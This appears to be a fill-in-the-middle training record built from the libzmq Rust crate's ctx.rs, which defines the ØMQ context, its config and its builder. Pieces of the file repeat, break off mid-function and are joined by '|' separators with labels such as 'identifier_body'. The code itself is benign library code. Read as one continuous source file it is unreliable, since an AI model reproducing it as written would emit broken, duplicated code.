/// A convenience builder for a [`Ctx`].
///
/// Makes complex context configuration more convenient.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxBuilder {
inner: CtxConfig,
}
impl CtxBuilder {
pub fn new() -> Self {
Self::default()
}
/// Builds a `Ctx` from a `CtxBuilder`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let ctx = CtxBuilder::new()
/// .io_threads(2)
/// .no_linger()
/// .build()?;
///
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
/// Applies a `CtxBuilder` to an existing `Ctx`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let global = Ctx::global();
///
/// CtxBuilder::new()
/// .io_threads(0)
/// .max_msg_size(420)
/// .max_sockets(69)
/// .no_linger()
/// .apply(global)?;
///
/// assert_eq!(global.io_threads(), 0);
/// assert_eq!(global.max_msg_size(), 420);
/// assert_eq!(global.no_linger(), true);
/// assert_eq!(global.max_sockets(), 69);
/// #
/// # Ok(())
/// # }
/// ```
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
self.inner.apply(ctx)
}
/// See [`set_io_threads`].
///
/// [`set_io_threads`]: struct.Ctx.html#method.set_io_threads
pub fn io_threads(&mut self, value: i32) -> &mut Self {
self.inner.set_io_threads(Some(value));
self
}
/// See [`set_max_msg_size`].
///
/// [`set_max_msg_size`]: struct.Ctx.html#method.set_max_msg_size
pub fn max_msg_size(&mut self, value: i32) -> &mut Self {
self.inner.set_max_msg_size(Some(value));
self
}
/// See [`set_max_sockets`].
///
/// [`set_max_sockets`]: struct.Ctx.html#method.set_max_sockets
pub fn max_sockets(&mut self, value: i32) -> &mut Self {
self.inner.set_max_sockets(Some(value));
self
}
/// See [`set_no_linger`].
///
/// [`set_no_linger`]: struct.Ctx.html#method.set_no_linger
pub fn no_linger(&mut self) -> &mut Self {
self.inner.set_no_linger(Some(true));
self
}
}
/// Keeps the list of sockets and manages the async I/O thread and
/// internal queries.
///
/// Each context also has an associated `AuthServer` which handles socket
/// authentification.
///
/// # Drop
/// The context will call terminate when dropped which will cause all
/// blocking calls to fail with `CtxTerminated`, then block until
/// the following conditions are met:
/// * All sockets open within context have been dropped.
/// * All messages sent by the application with have either been physically
/// transferred to a network peer, or the socket's linger period has expired.
///
/// # Thread safety
/// A ØMQ context is internally thread safe.
///
/// # Multiple Contexts
/// Multiple contexts are allowed but are considered exotic.
#[derive(Clone, Eq, PartialEq, Debug)]
pub struct Ctx {
raw: Arc<RawCtx>,
}
impl Ctx {
/// Create a new ØMQ context.
///
/// For almost all use cases, using and configuring the [`global`] context
/// will be enought.
///
/// See [`zmq_ctx_new`].
///
/// [`zmq_ctx_new`]: http://api.zeromq.org/master:zmq-ctx-new
///
/// # Usage Example
/// ```
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// let cloned = ctx.clone();
///
/// assert_eq!(ctx, cloned);
/// assert_ne!(ctx, Ctx::new());
/// ```
///
/// [`global`]: #method.global
pub fn new() -> Self {
let raw = Arc::new(RawCtx::default());
// Enable ipv6 by default.
raw.set_bool(RawCtxOption::IPV6, true).unwrap();
let ctx = Self { raw };
// Start a `ZAP` handler for the context.
let mut auth = AuthServer::with_ctx(&ctx).unwrap();
// This thread is guaranteed to terminate before the ctx
// since it holds a `Arc` to it. No need to store & join the
// thread handle.
thread::spawn(move || auth.run());
ctx
}
/// Returns a reference to the global context.
///
/// This is a singleton used by sockets created via their respective
/// `::new()` method. It merely exists for convenience and is no different
/// from a context obtained via `Ctx::new()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::{Ctx, Client};
///
/// // A socket created via `new` will use the global `Ctx`.
/// let client = Client::new()?;
/// assert_eq!(client.ctx(), Ctx::global());
/// #
/// # Ok(())
/// # }
/// ```
pub fn global() -> &'static Ctx {
&GLOBAL_CONTEXT
}
/// Returns the size of the ØMQ thread pool for this context.
pub fn io_threads(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::IOThreads)
}
/// Set the size of the ØMQ thread pool to handle I/O operations.
///
/// "The general rule of thumb is to allow one I/O thread per gigabyte of
/// data in or out per second." - [`Pieter Hintjens`]
///
/// [`Pieter Hintjens`]: http://zguide.zeromq.org/page:all#I-O-Threads
///
/// # Default
/// The default value is `1`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.io_threads(), 1);
///
/// // Lets say our app exclusively uses the inproc transport
/// // for messaging. Then we dont need any I/O threads.
/// ctx.set_io_threads(0)?;
/// assert_eq!(ctx.io_threads(), 0);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_io_threads(&self, nb_threads: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::IOThreads, nb_threads)
}
/// Returns the maximum number of sockets allowed for this context.
pub fn max_sockets(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxSockets)
}
/// Sets the maximum number of sockets allowed on the context.
///
/// # Default
/// The default value is `1023`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_sockets(), 1023);
///
/// ctx.set_max_sockets(420)?;
/// assert_eq!(ctx.max_sockets(), 420);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_sockets(&self, max: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxSockets, max)
}
/// Returns the maximum size of a message allowed for this context.
pub fn max_msg_size(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxMsgSize)
}
/// Sets the maximum allowed size of a message sent in the context.
///
/// # Default
/// The default value is `i32::max_value()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_msg_size(), i32::max_value());
///
/// ctx.set_max_msg_size(i32::max_value() - 1)?;
/// assert_eq!(ctx.max_msg_size(), i32::max_value() - 1);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_msg_size(&self, size: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxMsgSize, size)
}
/// Returns the largest number of sockets that the context will accept.
pub fn socket_limit(&self) -> i32 {
| /// A value of `true` indicates that all new sockets are given a
/// linger timeout of zero.
///
pub fn no_linger(&self) -> bool {
!self.raw.as_ref().get_bool(RawCtxOption::Blocky)
}
/// When set to `true`, all new sockets are given a linger timeout
/// of zero.
///
/// # Default
/// The default value is `false`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.no_linger(), false);
///
/// ctx.set_no_linger(true)?;
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_no_linger(&self, enabled: bool) -> Result<(), Error> {
self.raw.as_ref().set_bool(RawCtxOption::Blocky, !enabled)
}
/// Shutdown the ØMQ context context.
///
/// Context shutdown will cause any blocking operations currently in
/// progress on sockets open within context to fail immediately with
/// [`CtxTerminated`].
///
/// Any further operations on sockets open within context shall fail with
/// with [`CtxTerminated`].
///
/// [`CtxTerminated`]: ../error/enum.ErrorKind.html#variant.CtxTerminated
pub fn shutdown(&self) {
self.raw.shutdown()
}
pub(crate) fn as_ptr(&self) -> *mut c_void {
self.raw.ctx
}
}
impl Default for Ctx {
fn default() -> Self {
Self::new()
}
}
impl<'a> From<&'a Ctx> for Ctx {
fn from(c: &'a Ctx) -> Ctx {
c.to_owned()
}
}
| self.raw.as_ref().get(RawCtxOption::SocketLimit)
}
| identifier_body |
ctx.rs | //! The ØMQ context type.
use crate::{auth::server::AuthServer, error::*};
use libzmq_sys as sys;
use sys::errno;
use lazy_static::lazy_static;
use serde::{Deserialize, Serialize};
use std::{
os::raw::{c_int, c_void},
ptr, str,
sync::Arc,
thread,
};
lazy_static! {
static ref GLOBAL_CONTEXT: Ctx = Ctx::new();
}
#[derive(Copy, Clone, Debug)]
enum RawCtxOption {
IOThreads,
MaxSockets,
MaxMsgSize,
SocketLimit,
IPV6,
Blocky,
}
impl From<RawCtxOption> for c_int {
fn from(r: RawCtxOption) -> c_int {
match r {
RawCtxOption::IOThreads => sys::ZMQ_IO_THREADS as c_int,
RawCtxOption::MaxSockets => sys::ZMQ_MAX_SOCKETS as c_int,
RawCtxOption::MaxMsgSize => sys::ZMQ_MAX_MSGSZ as c_int,
RawCtxOption::SocketLimit => sys::ZMQ_SOCKET_LIMIT as c_int,
RawCtxOption::IPV6 => sys::ZMQ_IPV6 as c_int,
RawCtxOption::Blocky => sys::ZMQ_BLOCKY as c_int,
}
}
}
#[derive(Debug)]
struct RawCtx {
ctx: *mut c_void,
}
impl RawCtx {
fn get(&self, option: RawCtxOption) -> i32 {
unsafe { sys::zmq_ctx_get(self.ctx, option.into()) }
}
fn set(&self, option: RawCtxOption, value: i32) -> Result<(), Error> {
let rc = unsafe { sys::zmq_ctx_set(self.ctx, option.into(), value) };
if rc == -1 {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINVAL => Err(Error::new(ErrorKind::InvalidInput {
msg: "invalid value",
})),
_ => panic!(msg_from_errno(errno)),
}
} else {
Ok(())
}
}
fn set_bool(&self, opt: RawCtxOption, flag: bool) -> Result<(), Error> {
self.set(opt, flag as i32)
}
fn get_bool(&self, opt: RawCtxOption) -> bool {
let flag = self.get(opt);
flag != 0
}
fn terminate(&self) {
// We loop in case `zmq_ctx_term` get interrupted by a signal.
loop {
let rc = unsafe { sys::zmq_ctx_term(self.ctx) };
if rc == 0 {
break;
} else {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINTR => (),
_ => unreachable!(),
}
}
}
}
fn shutdown(&self) {
let rc = unsafe { sys::zmq_ctx_shutdown(self.ctx) };
// Should never fail.
assert_eq!(rc, 0);
}
}
// The `zmq_ctx` is internally threadsafe.
unsafe impl Send for RawCtx {}
unsafe impl Sync for RawCtx {}
impl Drop for RawCtx {
fn drop(&mut self) {
self.terminate()
}
}
impl PartialEq for RawCtx {
/// Compares the two underlying raw C pointers.
fn eq(&self, other: &Self) -> bool {
ptr::eq(self.ctx, other.ctx)
}
}
impl Eq for RawCtx {}
impl Default for RawCtx {
fn default() -> Self {
let ctx = unsafe { sys::zmq_ctx_new() };
if ctx.is_null() { |
Self { ctx }
}
}
/// A config for a [`Ctx`].
///
/// Usefull in configuration files.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxConfig {
io_threads: Option<i32>,
max_msg_size: Option<i32>,
max_sockets: Option<i32>,
no_linger: Option<bool>,
}
impl CtxConfig {
pub fn new() -> Self {
Self::default()
}
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
if let Some(value) = self.io_threads {
ctx.set_io_threads(value)?;
}
if let Some(value) = self.max_sockets {
ctx.set_max_sockets(value)?;
}
if let Some(value) = self.max_msg_size {
ctx.set_max_msg_size(value)?;
}
if let Some(value) = self.no_linger {
ctx.set_no_linger(value)?;
}
Ok(())
}
pub fn io_threads(&self) -> Option<i32> {
self.io_threads
}
pub fn set_io_threads(&mut self, value: Option<i32>) {
self.io_threads = value;
}
pub fn max_msg_size(&self) -> Option<i32> {
self.max_msg_size
}
pub fn set_max_msg_size(&mut self, value: Option<i32>) {
self.max_msg_size = value;
}
pub fn max_sockets(&mut self) -> Option<i32> {
self.max_sockets
}
pub fn set_max_sockets(&mut self, value: Option<i32>) {
self.max_sockets = value;
}
pub fn no_linger(&self) -> Option<bool> {
self.no_linger
}
pub fn set_no_linger(&mut self, value: Option<bool>) {
self.no_linger = value;
}
}
/// A convenience builder for a [`Ctx`].
///
/// Makes complex context configuration more convenient.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxBuilder {
inner: CtxConfig,
}
impl CtxBuilder {
pub fn new() -> Self {
Self::default()
}
/// Builds a `Ctx` from a `CtxBuilder`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let ctx = CtxBuilder::new()
/// .io_threads(2)
/// .no_linger()
/// .build()?;
///
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
/// Applies a `CtxBuilder` to an existing `Ctx`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let global = Ctx::global();
///
/// CtxBuilder::new()
/// .io_threads(0)
/// .max_msg_size(420)
/// .max_sockets(69)
/// .no_linger()
/// .apply(global)?;
///
/// assert_eq!(global.io_threads(), 0);
/// assert_eq!(global.max_msg_size(), 420);
/// assert_eq!(global.no_linger(), true);
/// assert_eq!(global.max_sockets(), 69);
/// #
/// # Ok(())
/// # }
/// ```
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
self.inner.apply(ctx)
}
/// See [`set_io_threads`].
///
/// [`set_io_threads`]: struct.Ctx.html#method.set_io_threads
pub fn io_threads(&mut self, value: i32) -> &mut Self {
self.inner.set_io_threads(Some(value));
self
}
/// See [`set_max_msg_size`].
///
/// [`set_max_msg_size`]: struct.Ctx.html#method.set_max_msg_size
pub fn max_msg_size(&mut self, value: i32) -> &mut Self {
self.inner.set_max_msg_size(Some(value));
self
}
/// See [`set_max_sockets`].
///
/// [`set_max_sockets`]: struct.Ctx.html#method.set_max_sockets
pub fn max_sockets(&mut self, value: i32) -> &mut Self {
self.inner.set_max_sockets(Some(value));
self
}
/// See [`set_no_linger`].
///
/// [`set_no_linger`]: struct.Ctx.html#method.set_no_linger
pub fn no_linger(&mut self) -> &mut Self {
self.inner.set_no_linger(Some(true));
self
}
}
/// Keeps the list of sockets and manages the async I/O thread and
/// internal queries.
///
/// Each context also has an associated `AuthServer` which handles socket
/// authentification.
///
/// # Drop
/// The context will call terminate when dropped which will cause all
/// blocking calls to fail with `CtxTerminated`, then block until
/// the following conditions are met:
/// * All sockets open within context have been dropped.
/// * All messages sent by the application with have either been physically
/// transferred to a network peer, or the socket's linger period has expired.
///
/// # Thread safety
/// A ØMQ context is internally thread safe.
///
/// # Multiple Contexts
/// Multiple contexts are allowed but are considered exotic.
#[derive(Clone, Eq, PartialEq, Debug)]
pub struct Ctx {
raw: Arc<RawCtx>,
}
impl Ctx {
/// Create a new ØMQ context.
///
/// For almost all use cases, using and configuring the [`global`] context
/// will be enought.
///
/// See [`zmq_ctx_new`].
///
/// [`zmq_ctx_new`]: http://api.zeromq.org/master:zmq-ctx-new
///
/// # Usage Example
/// ```
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// let cloned = ctx.clone();
///
/// assert_eq!(ctx, cloned);
/// assert_ne!(ctx, Ctx::new());
/// ```
///
/// [`global`]: #method.global
pub fn new() -> Self {
let raw = Arc::new(RawCtx::default());
// Enable ipv6 by default.
raw.set_bool(RawCtxOption::IPV6, true).unwrap();
let ctx = Self { raw };
// Start a `ZAP` handler for the context.
let mut auth = AuthServer::with_ctx(&ctx).unwrap();
// This thread is guaranteed to terminate before the ctx
// since it holds a `Arc` to it. No need to store & join the
// thread handle.
thread::spawn(move || auth.run());
ctx
}
/// Returns a reference to the global context.
///
/// This is a singleton used by sockets created via their respective
/// `::new()` method. It merely exists for convenience and is no different
/// from a context obtained via `Ctx::new()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::{Ctx, Client};
///
/// // A socket created via `new` will use the global `Ctx`.
/// let client = Client::new()?;
/// assert_eq!(client.ctx(), Ctx::global());
/// #
/// # Ok(())
/// # }
/// ```
pub fn global() -> &'static Ctx {
&GLOBAL_CONTEXT
}
/// Returns the size of the ØMQ thread pool for this context.
pub fn io_threads(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::IOThreads)
}
/// Set the size of the ØMQ thread pool to handle I/O operations.
///
/// "The general rule of thumb is to allow one I/O thread per gigabyte of
/// data in or out per second." - [`Pieter Hintjens`]
///
/// [`Pieter Hintjens`]: http://zguide.zeromq.org/page:all#I-O-Threads
///
/// # Default
/// The default value is `1`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.io_threads(), 1);
///
/// // Lets say our app exclusively uses the inproc transport
/// // for messaging. Then we dont need any I/O threads.
/// ctx.set_io_threads(0)?;
/// assert_eq!(ctx.io_threads(), 0);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_io_threads(&self, nb_threads: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::IOThreads, nb_threads)
}
/// Returns the maximum number of sockets allowed for this context.
pub fn max_sockets(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxSockets)
}
/// Sets the maximum number of sockets allowed on the context.
///
/// # Default
/// The default value is `1023`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_sockets(), 1023);
///
/// ctx.set_max_sockets(420)?;
/// assert_eq!(ctx.max_sockets(), 420);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_sockets(&self, max: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxSockets, max)
}
/// Returns the maximum size of a message allowed for this context.
pub fn max_msg_size(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxMsgSize)
}
/// Sets the maximum allowed size of a message sent in the context.
///
/// # Default
/// The default value is `i32::max_value()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_msg_size(), i32::max_value());
///
/// ctx.set_max_msg_size(i32::max_value() - 1)?;
/// assert_eq!(ctx.max_msg_size(), i32::max_value() - 1);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_msg_size(&self, size: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxMsgSize, size)
}
/// Returns the largest number of sockets that the context will accept.
pub fn socket_limit(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::SocketLimit)
}
/// A value of `true` indicates that all new sockets are given a
/// linger timeout of zero.
///
pub fn no_linger(&self) -> bool {
!self.raw.as_ref().get_bool(RawCtxOption::Blocky)
}
/// When set to `true`, all new sockets are given a linger timeout
/// of zero.
///
/// # Default
/// The default value is `false`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.no_linger(), false);
///
/// ctx.set_no_linger(true)?;
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_no_linger(&self, enabled: bool) -> Result<(), Error> {
self.raw.as_ref().set_bool(RawCtxOption::Blocky, !enabled)
}
/// Shutdown the ØMQ context context.
///
/// Context shutdown will cause any blocking operations currently in
/// progress on sockets open within context to fail immediately with
/// [`CtxTerminated`].
///
/// Any further operations on sockets open within context shall fail with
/// with [`CtxTerminated`].
///
/// [`CtxTerminated`]: ../error/enum.ErrorKind.html#variant.CtxTerminated
pub fn shutdown(&self) {
self.raw.shutdown()
}
pub(crate) fn as_ptr(&self) -> *mut c_void {
self.raw.ctx
}
}
impl Default for Ctx {
fn default() -> Self {
Self::new()
}
}
impl<'a> From<&'a Ctx> for Ctx {
fn from(c: &'a Ctx) -> Ctx {
c.to_owned()
}
}
|
panic!(msg_from_errno(unsafe { sys::zmq_errno() }));
}
| conditional_block |
ctx.rs | //! The ØMQ context type.
use crate::{auth::server::AuthServer, error::*};
use libzmq_sys as sys;
use sys::errno;
use lazy_static::lazy_static;
use serde::{Deserialize, Serialize};
use std::{
os::raw::{c_int, c_void},
ptr, str,
sync::Arc,
thread,
};
lazy_static! {
static ref GLOBAL_CONTEXT: Ctx = Ctx::new(); | IOThreads,
MaxSockets,
MaxMsgSize,
SocketLimit,
IPV6,
Blocky,
}
impl From<RawCtxOption> for c_int {
fn from(r: RawCtxOption) -> c_int {
match r {
RawCtxOption::IOThreads => sys::ZMQ_IO_THREADS as c_int,
RawCtxOption::MaxSockets => sys::ZMQ_MAX_SOCKETS as c_int,
RawCtxOption::MaxMsgSize => sys::ZMQ_MAX_MSGSZ as c_int,
RawCtxOption::SocketLimit => sys::ZMQ_SOCKET_LIMIT as c_int,
RawCtxOption::IPV6 => sys::ZMQ_IPV6 as c_int,
RawCtxOption::Blocky => sys::ZMQ_BLOCKY as c_int,
}
}
}
#[derive(Debug)]
struct RawCtx {
ctx: *mut c_void,
}
impl RawCtx {
fn get(&self, option: RawCtxOption) -> i32 {
unsafe { sys::zmq_ctx_get(self.ctx, option.into()) }
}
fn set(&self, option: RawCtxOption, value: i32) -> Result<(), Error> {
let rc = unsafe { sys::zmq_ctx_set(self.ctx, option.into(), value) };
if rc == -1 {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINVAL => Err(Error::new(ErrorKind::InvalidInput {
msg: "invalid value",
})),
_ => panic!(msg_from_errno(errno)),
}
} else {
Ok(())
}
}
fn set_bool(&self, opt: RawCtxOption, flag: bool) -> Result<(), Error> {
self.set(opt, flag as i32)
}
fn get_bool(&self, opt: RawCtxOption) -> bool {
let flag = self.get(opt);
flag != 0
}
fn terminate(&self) {
// We loop in case `zmq_ctx_term` get interrupted by a signal.
loop {
let rc = unsafe { sys::zmq_ctx_term(self.ctx) };
if rc == 0 {
break;
} else {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINTR => (),
_ => unreachable!(),
}
}
}
}
fn shutdown(&self) {
let rc = unsafe { sys::zmq_ctx_shutdown(self.ctx) };
// Should never fail.
assert_eq!(rc, 0);
}
}
// The `zmq_ctx` is internally threadsafe.
unsafe impl Send for RawCtx {}
unsafe impl Sync for RawCtx {}
impl Drop for RawCtx {
fn drop(&mut self) {
self.terminate()
}
}
impl PartialEq for RawCtx {
/// Compares the two underlying raw C pointers.
fn eq(&self, other: &Self) -> bool {
ptr::eq(self.ctx, other.ctx)
}
}
impl Eq for RawCtx {}
impl Default for RawCtx {
fn default() -> Self {
let ctx = unsafe { sys::zmq_ctx_new() };
if ctx.is_null() {
panic!(msg_from_errno(unsafe { sys::zmq_errno() }));
}
Self { ctx }
}
}
/// A config for a [`Ctx`].
///
/// Usefull in configuration files.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxConfig {
io_threads: Option<i32>,
max_msg_size: Option<i32>,
max_sockets: Option<i32>,
no_linger: Option<bool>,
}
impl CtxConfig {
pub fn new() -> Self {
Self::default()
}
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
if let Some(value) = self.io_threads {
ctx.set_io_threads(value)?;
}
if let Some(value) = self.max_sockets {
ctx.set_max_sockets(value)?;
}
if let Some(value) = self.max_msg_size {
ctx.set_max_msg_size(value)?;
}
if let Some(value) = self.no_linger {
ctx.set_no_linger(value)?;
}
Ok(())
}
pub fn io_threads(&self) -> Option<i32> {
self.io_threads
}
pub fn set_io_threads(&mut self, value: Option<i32>) {
self.io_threads = value;
}
pub fn max_msg_size(&self) -> Option<i32> {
self.max_msg_size
}
pub fn set_max_msg_size(&mut self, value: Option<i32>) {
self.max_msg_size = value;
}
pub fn max_sockets(&mut self) -> Option<i32> {
self.max_sockets
}
pub fn set_max_sockets(&mut self, value: Option<i32>) {
self.max_sockets = value;
}
pub fn no_linger(&self) -> Option<bool> {
self.no_linger
}
pub fn set_no_linger(&mut self, value: Option<bool>) {
self.no_linger = value;
}
}
/// A convenience builder for a [`Ctx`].
///
/// Makes complex context configuration more convenient.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxBuilder {
inner: CtxConfig,
}
impl CtxBuilder {
pub fn new() -> Self {
Self::default()
}
/// Builds a `Ctx` from a `CtxBuilder`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let ctx = CtxBuilder::new()
/// .io_threads(2)
/// .no_linger()
/// .build()?;
///
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
/// Applies a `CtxBuilder` to an existing `Ctx`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let global = Ctx::global();
///
/// CtxBuilder::new()
/// .io_threads(0)
/// .max_msg_size(420)
/// .max_sockets(69)
/// .no_linger()
/// .apply(global)?;
///
/// assert_eq!(global.io_threads(), 0);
/// assert_eq!(global.max_msg_size(), 420);
/// assert_eq!(global.no_linger(), true);
/// assert_eq!(global.max_sockets(), 69);
/// #
/// # Ok(())
/// # }
/// ```
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
self.inner.apply(ctx)
}
/// See [`set_io_threads`].
///
/// [`set_io_threads`]: struct.Ctx.html#method.set_io_threads
pub fn io_threads(&mut self, value: i32) -> &mut Self {
self.inner.set_io_threads(Some(value));
self
}
/// See [`set_max_msg_size`].
///
/// [`set_max_msg_size`]: struct.Ctx.html#method.set_max_msg_size
pub fn max_msg_size(&mut self, value: i32) -> &mut Self {
self.inner.set_max_msg_size(Some(value));
self
}
/// See [`set_max_sockets`].
///
/// [`set_max_sockets`]: struct.Ctx.html#method.set_max_sockets
pub fn max_sockets(&mut self, value: i32) -> &mut Self {
self.inner.set_max_sockets(Some(value));
self
}
/// See [`set_no_linger`].
///
/// [`set_no_linger`]: struct.Ctx.html#method.set_no_linger
pub fn no_linger(&mut self) -> &mut Self {
self.inner.set_no_linger(Some(true));
self
}
}
/// Keeps the list of sockets and manages the async I/O thread and
/// internal queries.
///
/// Each context also has an associated `AuthServer` which handles socket
/// authentification.
///
/// # Drop
/// The context will call terminate when dropped which will cause all
/// blocking calls to fail with `CtxTerminated`, then block until
/// the following conditions are met:
/// * All sockets open within context have been dropped.
/// * All messages sent by the application with have either been physically
/// transferred to a network peer, or the socket's linger period has expired.
///
/// # Thread safety
/// A ØMQ context is internally thread safe.
///
/// # Multiple Contexts
/// Multiple contexts are allowed but are considered exotic.
#[derive(Clone, Eq, PartialEq, Debug)]
pub struct Ctx {
raw: Arc<RawCtx>,
}
impl Ctx {
/// Create a new ØMQ context.
///
/// For almost all use cases, using and configuring the [`global`] context
/// will be enought.
///
/// See [`zmq_ctx_new`].
///
/// [`zmq_ctx_new`]: http://api.zeromq.org/master:zmq-ctx-new
///
/// # Usage Example
/// ```
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// let cloned = ctx.clone();
///
/// assert_eq!(ctx, cloned);
/// assert_ne!(ctx, Ctx::new());
/// ```
///
/// [`global`]: #method.global
pub fn new() -> Self {
let raw = Arc::new(RawCtx::default());
// Enable ipv6 by default.
raw.set_bool(RawCtxOption::IPV6, true).unwrap();
let ctx = Self { raw };
// Start a `ZAP` handler for the context.
let mut auth = AuthServer::with_ctx(&ctx).unwrap();
// This thread is guaranteed to terminate before the ctx
// since it holds a `Arc` to it. No need to store & join the
// thread handle.
thread::spawn(move || auth.run());
ctx
}
/// Returns a reference to the global context.
///
/// This is a singleton used by sockets created via their respective
/// `::new()` method. It merely exists for convenience and is no different
/// from a context obtained via `Ctx::new()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::{Ctx, Client};
///
/// // A socket created via `new` will use the global `Ctx`.
/// let client = Client::new()?;
/// assert_eq!(client.ctx(), Ctx::global());
/// #
/// # Ok(())
/// # }
/// ```
pub fn global() -> &'static Ctx {
&GLOBAL_CONTEXT
}
/// Returns the size of the ØMQ thread pool for this context.
pub fn io_threads(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::IOThreads)
}
/// Set the size of the ØMQ thread pool to handle I/O operations.
///
/// "The general rule of thumb is to allow one I/O thread per gigabyte of
/// data in or out per second." - [`Pieter Hintjens`]
///
/// [`Pieter Hintjens`]: http://zguide.zeromq.org/page:all#I-O-Threads
///
/// # Default
/// The default value is `1`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
